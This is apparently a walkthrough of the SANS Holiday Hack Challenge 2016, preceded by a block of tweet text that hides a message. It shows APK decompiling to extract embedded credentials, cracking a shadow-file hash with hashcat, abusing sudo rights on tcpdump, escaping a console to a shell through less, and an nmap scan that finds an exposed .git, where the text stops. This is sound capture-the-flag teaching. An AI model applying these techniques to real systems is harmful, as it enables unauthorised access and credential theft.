SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ Nov 14, 2016
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ Nov 14, 2016
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH Nov 14, 2016
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ Nov 14, 2016
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF Nov 14, 2016
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ Nov 14, 2016
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF Nov 14, 2016
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ Nov 14, 2016
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO Nov 14, 2016
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ Nov 14, 2016
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF Nov 14, 2016
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS Nov 14, 2016
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ Nov 14, 2016
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ Nov 14, 2016
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ Nov 14, 2016
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF Nov 14, 2016
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY Nov 14, 2016
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF Nov 14, 2016
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ Nov 14, 2016
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO Nov 14, 2016
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ Nov 14, 2016
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ Nov 14, 2016
NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF Nov 14, 2016
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ Nov 14, 2016
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH Nov 14, 2016
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF Nov 14, 2016
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY Nov 14, 2016
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF Nov 14, 2016
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ Nov 14, 2016
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ Nov 14, 2016
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ Nov 14, 2016
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY Nov 14, 2016
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY Nov 14, 2016
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ Nov 14, 2016
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ Nov 14, 2016
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ Nov 14, 2016
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF Nov 14, 2016
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ Nov 14, 2016
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY Nov 14, 2016
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ Nov 14, 2016
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ Nov 14, 2016
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ Nov 14, 2016
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO Nov 14, 2016
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY Nov 14, 2016
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ Nov 14, 2016
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ Nov 14, 2016
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY Nov 14, 2016
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ Nov 14, 2016
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ Nov 14, 2016
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF Nov 14, 2016
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF Nov 14, 2016
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA Nov 14, 2016
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ Nov 14, 2016
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ Nov 14, 2016
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO Nov 14, 2016
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH Nov 14, 2016
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF Nov 14, 2016
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ Nov 14, 2016
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ Nov 14, 2016
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO Nov 14, 2016
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH Nov 14, 2016
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ Nov 14, 2016
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY Nov 14, 2016
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ Nov 14, 2016
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ Nov 14, 2016
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS Nov 14, 2016
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY Nov 14, 2016
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY Nov 14, 2016
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF Nov 14, 2016
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ Nov 14, 2016
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF Nov 14, 2016
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO Nov 14, 2016
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY Nov 14, 2016
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ Nov 14, 2016
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF Nov 14, 2016
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF Nov 14, 2016
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY Nov 14, 2016
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ Nov 14, 2016
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ Nov 14, 2016
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY Nov 14, 2016
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ Nov 14, 2016
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ Nov 14, 2016
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ Nov 14, 2016
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ Nov 14, 2016
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH Nov 14, 2016
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ Nov 14, 2016
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS Nov 14, 2016
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ Nov 14, 2016
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ Nov 14, 2016
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF Nov 14, 2016
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ Nov 14, 2016
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ Nov 14, 2016
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY Nov 14, 2016
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY Nov 14, 2016
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY Nov 14, 2016
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ Nov 14, 2016
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY Nov 14, 2016
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ Nov 14, 2016
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ Nov 14, 2016
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH Nov 14, 2016
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ Nov 14, 2016
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF Nov 14, 2016JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ Nov 14, 2016

His Instagram profile contains 3 images, with the first one showing a ZIP filename (top of laptop screen) and an Nmap report for “www.northpolewonderland.com” (on the right of the image) :

The domain is also given out in the game for two other downloads (see below), and the elf “Tom Hessman” mentions that the domain is only to be used for downloads. Combining the domain and filename makes a working link to a ZIP file: http://www.northpolewonderland.com/SantaGram_v4.2.zip

The ZIP file is password protected, but the secret message from the tweets (lowercase) is the password: “bugbounty”. Inside is a “SantaGram_4.2.apk” file – an Android application (called “SatanGram”). So back to the questions:

1) What is the secret message in Santa’s tweets? BUG BOUNTY
2) What is inside the ZIP file distributed by Santa’s team? The SantaGram 4.2 Android application (apk file)


Part 2: Awesome Package Konveyance

3) What username and password are embedded in the APK file?
4) What is the name of the audible component (audio file) in the SantaGram APK file?

By talking to the elf “Bushy Evergreen” up the long ladder in-game, we’re told of tools to decompile and re-compile Android APK files:

<Bushy Evergreen> – Hi, I’m Bushy Evergreen. Shinny and I lead up the Android analysis team.
<Bushy Evergreen> – Shinny spends most of her time on app reverse engineering. I prefer to analyze apps at the Android bytecode layer.
<Bushy Evergreen> – My favorite technique? Decompiling Android apps with Apktool.
<Bushy Evergreen> – JadX is great for inspecting a Java representation of the app, but can’t be changed and then recompiled.
<Bushy Evergreen> – With Apktool, I can preserve the functionality of the app, then change the Android bytecode smali files.
<Bushy Evergreen> – I can even change the values in Android XML files, then use Apktool again to recompile the app.
<Bushy Evergreen> – Apktool compiled apps can’t be installed and run until they are signed. The Java keytool and jarsigner utilities are all you need for that.
<Bushy Evergreen> – This video on manipulating and re-signing Android apps is pretty useful.

Decompiling the APK (with either tool), and then searching through the output files for the word “password” quite easily reveals the username of “guest” and password of “busyreindeer78“. You could also install the APK file on to an Android device, intercept the network traffic to the analytics server, and see the username and password there.

To decompile with Apktool (because you’ll need to have later), after downloading it and making sure Java is installed:

temp: ls -l
-rwxrwxrwx 1 hypn hypn 6972627 Dec 15 20:35 apktool.jar
-rwxrwxrwx 1 hypn hypn 2257390 Dec 15 20:35 SantaGram_4.2.apk

temp: java -jar apktool.jar d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/hypn/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

temp: ls -l
total 9018
-rwxrwxrwx 1 hypn hypn 6972627 Dec 15 20:35 apktool.jar
drwxrwxrwx 1 hypn hypn    4096 Dec 15 20:36 SantaGram_4.2
-rwxrwxrwx 1 hypn hypn 2257390 Dec 15 20:35 SantaGram_4.2.apk

temp: ls -l SantaGram_4.2
total 44
-rwxrwxrwx 1 hypn hypn  2569 Dec 15 20:36 AndroidManifest.xml
-rwxrwxrwx 1 hypn hypn   398 Dec 15 20:36 apktool.yml
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 assets
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 original
drwxrwxrwx 1 hypn hypn 40960 Dec 15 20:36 res
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 smali

Inside, at the workshop train station, we can also talk to “Shinny Upatree” who tells us:

<Shinny Upatree> – Hi, my name is Shinny Upatree. I’m one of Santa’s bug bounty elves.
<Shinny Upatree> – I’m the newest elf on Santa’s bug bounty team. I’ve been spending time reversing Android apps.
<Shinny Upatree> – Did you know Android APK files are just zip files? If you unzip them, you can look at the application files.
<Shinny Upatree> – Android apps written in Java can be reverse engineered back into the Java form using JadX.
<Shinny Upatree> – The JadX-gui tool is quick and easy to decompile an APK, but the jadx command-line tool will export the APK as individual Java files.
<Shinny Upatree> – Android Studio can import JadX’s decompiled files. It makes it easier to understand obfuscated code.
<Shinny Upatree> – Take a look at Joshua Wright’s presentation from HackFest 2016 on using Android Studio and JadX effectively.

So either by decompiling or unzipping you should have extracted the APK and all of its files. Searching for common audio file extensions reveals “res/raw/discombobulatedaudio1.mp3“.

3) What username and password are embedded in the APK file? “guest” and “busyreindeer78”
4) What is the name of the audible component (audio file) in the SantaGram APK file? “discombobulatedaudio1.mp3


Part 3: A Fresh-Baked Holiday Pi

5) What is the password for the “cranpi” account on the Cranberry Pi system?
6) How did you open each terminal door and where had the villain imprisoned Santa?

We’re told to “retrieve all of the computer parts to build yourself a Cranberry Pi” (obviously a play on “Raspberry Pi”) on the site – this is all done in-game and is mostly a matter of exploring the world and finding the parts of the Cranberry PI hidden around. The first elf we meet when we arrive in the North Pole tells us:

<Holly Evergreen> – Hi, I’m Holly Evergreen. Welcome to the North Pole Wonderland!
<Holly Evergreen> – I’m glad you’re here. We need help finding Santa!
<Holly Evergreen> – He was delivering toys to good girls and boys, but he disappeared mysteriously.
<Holly Evergreen> – We saw his sleigh overhead, and some elves have found and collected pieces that fell to the ground.
<Holly Evergreen> – Come back to me if you’re able to find any of the pieces!

Talking to “Wunorse Openslae”, below the Christmas tree, gives us some useful info:

<Wunorse Openslae> – Hi, I’m Wunorse Openslae. I work on engineering projects for Santa.
<Wunorse Openslae> – A lot of people don’t know this, but his sleigh can travel through space and time. I’m quite proud.
<Wunorse Openslae> – The SCADA interface for sleigh functions is controlled with a Cranberry Pi and Cranbian Linux.
<Wunorse Openslae> – It’s really powerful to be able to switch out firmware builds by swapping SD cards.
<Wunorse Openslae> – Dealing with piles of SD cards though, that’s a different story. Fortunately, this article gave me some ideas on better data management.

And “Minty Candycane” in the small tree house tells us about cracking passwords:

<Minty Candycane> – Howdy, my name is Minty Candycane. I’m on the red team, Rudolph’s Red Team!
<Minty Candycane> – What did the elf say was the first step in using a Christmas computer?
<Minty Candycane> – “First, YULE LOGon”!
<Minty Candycane> – I crack people up.
<Minty Candycane> – Speaking of cracking, John the Ripper is fantastic for cracking hashes. It is good at determining the correct hashing algorithm.
<Minty Candycane> – I have a lot of luck with the RockYou password list.

The “Cranberry Pi Board” is found in the “Secret Fireplace Room” in “Elf House #1” (bottom left on the map)… yes really, you have to walk in to the fireplace:

The “Heat Sink” is in the house to the right of the big Christmas tree (“Elf House #2”), in the upstairs room (“Elf House #2 – Upstairs”), hidden behind a pile of bags:

The “Power Cord” is sticking out from behind the snow man’s head, next to the big Christmas tree:

The “HDMI Cable” is behind the reindeer in the workshop:

The “SD Card” is to the far left, normally off the screen, at the top of the ladder (outside the workshop) :

The parts all need to be taken back to “Holly Evergreen” (where we entered the North Pole) and we’re given a link to a Cranberry Pi image – obviously what we’ll need to get the “cranpi” password from, to answer the first question:

<Holly Evergreen> – Wow, you found all the pieces of the Cranberry Pi! Great job!
<Holly Evergreen> – I have one more piece for you to look at.
<Holly Evergreen> – You’ll need a Cranbian image to use the Cranberry Pi, but only Santa knows the login password.
<Holly Evergreen> – Can you download the image and tell me the password?

Now we need to leave the game for a bit, download the “cranbian” image file, unzip it, and mount as described in the link from Wunorse Openslae (above):

temp: fdisk -l cranbian-jessie.img
Disk cranbian-jessie.img: 1.3 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1

Device               Boot  Start     End Sectors  Size Id Type
cranbian-jessie.img1        8192  137215  129024   63M  c W95 FAT32 (LBA)
cranbian-jessie.img2      137216 2713599 2576384  1.2G 83 Linux


temp: mkdir cranbian
temp: sudo mount -v -o offset=$((512*137216)) -t ext4 cranbian-jessie.img cranbian
[sudo] password for hypn:
mount: /dev/loop1 mounted on /home/hypn/shared/SANS/cranbian.

temp: sudo cat cranbian/etc/shadow
root:*:17067:0:99999:7:::
...snip...
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

With the “shadow” file from the Crabian image, download the RockYou password list and start cracking with it (I used hashcat rather than “John the Ripper”) but you should get the answer fairly easily: “yummycookies“.

C:\hashcat-3.20>hashcat64.exe -m 1800 shadow rockyou.txt
hashcat (v3.20) starting...
...snip...
Generated dictionary stats for rockyou.txt: 139921497 bytes, 14344391 words, 14343296 keyspace
$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:yummycookies

Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha512crypt, SHA512(Unix)
Hash.Target......: $6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0
Time.Started.....: Thu Dec 15 17:34:08 2016 (47 secs)
Time.Estimated...: Thu Dec 15 17:34:55 2016 (0 secs)
Input.Base.......: File (rockyou.txt)
Input.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:    10006 H/s (6.29ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 471255/14343296 (3.29%)
Rejected.........: 215/471255 (0.05%)
Restore.Point....: 450757/14343296 (3.14%)
Candidates.#1....: 109803 -> ronhel
HWMon.Dev.#1.....: Temp: 64c Fan: 38% *Throttled*

Started: Thu Dec 15 17:34:02 2016
Stopped: Thu Dec 15 17:34:57 2016

Head back to “Holly Evergreen” where we entered the North Pole and give him the password we cracked above (say it in the chat).

Now for the the terminals:

The first terminal is in “Elf House #2” (next to the Christmas tree), at the back next to the door on the left. We’re told “To open the door, find both parts of the passphrase inside the /out.pcap file”. We need to look at the file, figure out how to access it (and what with), and ultimatley do some “sudo” magic (thanks to incorrect file permissions). We can see the file’s owned by “itchy”, and the user has sudo access to “strings” and “tcpdump” (which can read and write pcap files), and that we can read “itchy”s home directory. Using the “-H” sudo option to set the HOME variable to itchy’s home directory we’re able to run “tcpdump”, access the file, and grep for parts of the code:

sudo -H -u itchy tcpdump -s0 -A -r /out.pcap | grep part

 

We can find a clue to the second using TCP dump, and see that we’re dealing with some binary data. The “itchy” user also had sudo access to the “strings” command which supports some command line options for parsing data:

sudo -H -u itchy strings -n 7 -e l /out.pcap

 

I’d already guessed the password after the first step (characters from “The Simpsons” cartoon), but the passphrase when both parts are put together is: “santaslittlehelper“.


 

The second terminal is inside the workshop (at the top of the latter) to the left of the door, up the spiral staircase, and the challenge: “To open the door, find the passphrase file deep in the directories”. The passphrase is hidden in a file, buried in some directories that are somewhat tricky to type in – luckily we can use “grep” to find any content in any files, using “grep” to recursively find any text, giving us the passphrase “open_sesame“.


 

The third terminal is through the door, between the two bookcases (but where is the door?). The terminal greets us with “GREETINGS PROFESSOR FALKEN” – straight out of the movie “Wargames”. To solve this challenge you have to answer as per the movie – type in the lower case text after the “>” sign below:

GREETINGS PROFESSOR FALKEN.
> hello.
HOW ARE YOU FEELING TODAY?
> I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
> People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
> Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
> Later. Let's play Global Thermonuclear War.
FINE.
(which side do you want.)
> 2
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME:
> Las Vegas

PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME:
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE:
LOOK AT THE PRETTY LIGHTS

The “door” is the bookshelf on the left, and the passphrase is “LOOK AT THE PRETTY LIGHTS“. This will get you in to the corridor which has another door you can’t unlock until you’ve gotten and solved the audio files.


 

The fourth terminal is to the right of the reindeer: “Find the passphrase from the wumpus. Play fair or cheat; it’s up to you”. I’m not sure if it counts as cheating, but I just brute-force’d it, keeping track of which number rooms kill you (and not going to them again), trying to work from lowest to highest, choosing to “play again” when I died and to keep playing the same level. There after it was mostly just a matter of playing until the wumpus was nearby and shooting at the correct room, giving us the passphrase “WUMPUS IS MISUNDERSTOOD” (run the game with “./wumpus”).


 

The fifth (and final) terminal is in the workshop train station (door to the right of the workshop). Rather than giving us a challenge or instructions, we’re shown the “Train Management Console” – but we are told only authorized users are allowed to use it. We’re able to break out of the “HELP” menu (which looks like the “less” command, also note the emphasis in this line from the help file: “If it’s not here, this console cannot do it, unLESS you know something I don’t“) by typing in “!/bin/bash” – causing it to open us a bash shell. See the “less” man page about the “!” command. From here we can see the files for the terminal, get the password from the “Train_Console” file or just run “ActivateTrain” to be taken to 1978!

There are no terminals in 1978, but we still have to find Santa! Head back to the door next to the reindeer (still in 1978, in the workshop – all the way up the long ladder)… and there’s Santa! Talk to him to finish the quest:

<Santa Claus> – Well, hello there. You’ve rescued me! Thank you so much.
<Santa Claus> – I wish I could recall the circumstances that lead me to be imprisoned here in my very own Dungeon For Errant Reindeer (DFER). But, I seem to be suffering from short-term memory loss. It feels almost as though someone hit me over the head with a Christmas tree. I have no memory of what happened or who did that to me.
<Santa Claus> – But, this I do know. I wish I could stay here and properly thank you, my friend. But it is Christmas Eve and I MUST get all of these presents delivered before sunrise!
<Santa Claus> – I bid you a VERY MERRY CHRISTMAS… AND A HAPPY NEW YEAR!

5) What is the password for the “cranpi” account on the Cranberry Pi system? yummycookies
6) How did you open each terminal door and where had the villain imprisoned Santa? [as above] + Dungeon For Errant Reindeer (DFER)


Part 4: My Gosh… It’s Full of Holes

Analyze the […] the SantaGram APK file to identify target systems. Then, check with Tom Hessman at the North Pole to confirm that each IP address you find is included in the scope of your work. Each server has at least one flaw you can exploit to retrieve a small audio file on the system.

7) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS:
8) What are the names of the audio files you discovered from each system above? There are a total of SEVEN audio files (one from the original APK in Question 4, plus one for each of the six items in the bullet list above.)

These will be answered under each target below, the domain names can be found in the SantaGram Android application’s code (just search for “northpole” or “.com”) and intercepting the web traffic will also show you payloads send to most of the services.

  1. The Mobile Analytics Server (via credentialed login access)
  2. The Dungeon Game
  3. The Debug Server
  4. The Banner Ad Server
  5. The Uncaught Exception Handler Server
  6. Answers / audiofiles

The Mobile Analytics Server (via credentialed login access)

Address: analytics.northpolewonderland.com

Talking to “Minty Candycane” in the Small Tree House (between NetWars and the ladder to the workshop) earlier he also said:

<Minty Candycane> – I’ve been spending a lot of time with NMAP. It is such a great port scanner! I’m very thorough so I check all the TCP ports to look for extra services.
<Minty Candycane> – NMAP is also great for finding extra files on web servers. The default scripts run with the “-sC” option work really well for me.

Running an “nmap” scan with the “-sC” options gives us this:

temp: nmap -sC analytics.northpolewonderland.com

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-15 19:58 SAST
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.27s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https
| http-git:
|   104.198.252.157:443/.git/
|     Git repository found!
